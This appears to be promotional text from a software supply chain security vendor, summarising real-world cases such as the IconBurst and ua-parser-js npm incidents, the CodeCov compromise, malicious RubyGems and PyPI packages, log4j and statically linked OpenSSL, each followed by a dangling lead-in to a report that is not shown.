Typosquatting attacks prey on developers that mistype a package name during installation. While these attacks typically target developers, or the development environment, this series of malicious NPM packages abuses software supply chains to collect data from the unsuspecting software users. IconBurst represents a significant escalation of attacker tactics to further undermine software supply chain security. It is the first software supply chain attack in the open source package ecosystem that only triggers its payload when included in the software release.
Our software analysis report discloses these critical issues:
Sensitive information leaks, such as tokens and credentials, can expose parts of software development and distribution architecture to attackers. Unsigned software releases can be tampered with, or modified, to include backdoors or other malicious code. This is what happened to CodeCov when one of the leaked credentials was abused to gain access to the software distribution platform. Any user that executed the malicious bash script had their sensitive information leaked to the attackers as well.
Our software analysis report discloses these critical issues:
Maintainer account compromises can quickly escalate to impact the wider developer community. Even if the account gets quickly restored, the automated CI/CD systems may become compromised during the exposure window. This is what happened when the popular ua-parser-js NPM holder account was compromised, and the updated versions started serving malware.
Our software analysis report discloses these critical issues:
Typosquatting attacks prey on developers that mistype a package name during installation. Developers are the primary target of such attacks, as their credentials can be misused to pivot through the organization. This is a common pattern found in most open source package repositories. Depending on their sophistication, the attackers might even leverage off-the-shelf password recovery tools to collect credentials.
Our software analysis report discloses these critical issues:
Typosquatting attacks prey on developers that mistype a package name during installation. Once installed, the packages autoexecute their code, providing the opportunity for malware to achieve persistence. A malicious RubyGems package called atlas-client abused this to continuously monitor clipboard contents for digital currency wallet addresses. When one is detected, malware replaces it with its own, hoping that the unsuspecting victim would transfer funds to the attacker-controlled accounts.
Our software analysis report discloses these critical issues:
Typosquatting attacks prey on developers that mistype a package name during installation. During package installation, its dedicated functions are called to deploy it within the development environment. A malicious PyPi package called libpeshnx abused this to run its payload whenever an interactive non-login shell is created. In this case, the attacker has the ability to change the malicious payload at any time, since it is periodically downloaded from the remote server.
Our software analysis report discloses these critical issues:
Accidental inclusion of sensitive information, such as credentials or certificates, is quickly becoming the dominant way build environments get compromised. Safe secrets management is a challenge all developers face. Because secrets are used in so many ways during development, it is easy to accidentally include them in the release package or a container. Once the secrets are out in the open, the attackers can easily misuse them to gain access, plant backdoors, and pivot from build environment to production.
Our software analysis report discloses these critical issues:
Digital signatures are applied to applications, packages and documents as a cryptographically secured authenticity record. Signatures verify the origin and the integrity of the object they are applied to. Any mismatch between the expected and the computed object hashes is reported as an integrity validation failure. This can be caused by data corruption, or developers changing content post-signing, or by an attacker tampering with the package. While finding the root cause is an incident response exercise, tracking the issue remediation is easily automated with our differential reports. This example report shows a Microsoft package that had a tampered signature issue resolved in a subsequent software version.
Our software analysis report discloses this critical issue:
Most modern software is built on the shoulders of open source components. Managing critical vulnerabilities introduced to the code base by those third-party packages has become a daily chore for developers. When a critical remote code execution vulnerability hits the news, the questions of impact and exposure drive urgency and cause development teams to scramble. This is exactly what happened when a CVSS 10.0 vulnerability was found in a commonly used Java logging library - log4j.
Our software analysis report discloses these critical issues:
When building software components, a developer has many options for interacting with third-party code. Static linking is one of the most prolific ways for vulnerabilities to get unexpectedly included in a large code base. The deeper your dependency tree goes, the more likely it is that a part of it will link to an outdated dependency that’s statically linked. It is also very common to find multiple versions of the same dependency statically linked across components within a software package. This dependency version bifurcation exposes the application to unmanaged security risks. In the following example report, a NuGet package includes multiple statically linked versions of OpenSSL and ZLIB libraries. Both of them contain critical vulnerabilities.
Our software analysis report discloses these critical issues: